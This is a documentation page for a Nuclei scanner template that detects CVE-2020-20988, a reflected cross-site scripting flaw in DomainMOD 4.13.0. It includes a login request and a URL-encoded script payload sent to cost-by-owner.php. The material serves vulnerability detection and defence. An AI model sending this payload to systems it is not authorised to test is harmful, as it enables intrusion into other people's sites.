DomainMOD 4.13.0 - Cross-Site Scripting
ID: CVE-2020-20988
Severity: medium
Author: arafatansari
Tags: cve2020,cve,domainmod,xss,authenticated
Description
Section titled “Description”DomainMOD 4.13.0 is vulnerable to cross-site scripting via reporting/domains/cost-by-owner.php in the “or Expiring Between” parameter.
YAML Source
Section titled “YAML Source”id: CVE-2020-20988
info: name: DomainMOD 4.13.0 - Cross-Site Scripting author: arafatansari severity: medium description: | DomainMOD 4.13.0 is vulnerable to cross-site scripting via reporting/domains/cost-by-owner.php in the "or Expiring Between" parameter. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://mycvee.blogspot.com/p/xss2.html - https://nvd.nist.gov/vuln/detail/CVE-2020-20988 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2020-20988 cwe-id: CWE-79 epss-score: 0.0009 epss-percentile: 0.37789 cpe: cpe:2.3:a:domainmod:domainmod:4.13.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: domainmod product: domainmod tags: cve2020,cve,domainmod,xss,authenticated
http: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
new_username={{username}}&new_password={{password}} - | POST /reporting/domains/cost-by-owner.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
daterange=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
host-redirects: true max-redirects: 2 matchers: - type: dsl dsl: - 'status_code_2 == 200' - 'contains(header_2, "text/html")' - 'contains(body_2, "value=\"\"/><script>alert(document.domain)</script>")' - 'contains(body_2, "DomainMOD")' condition: and# digest: 4a0a00473045022045d52af3043ec3355c026da1b8588985cb81a3615b3a1f3eba63d2ea4d893da4022100c5e369b0739b40f0f95327f65e94d88ed27525859269bdcd6be8c4060649d61d:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-20988.yaml"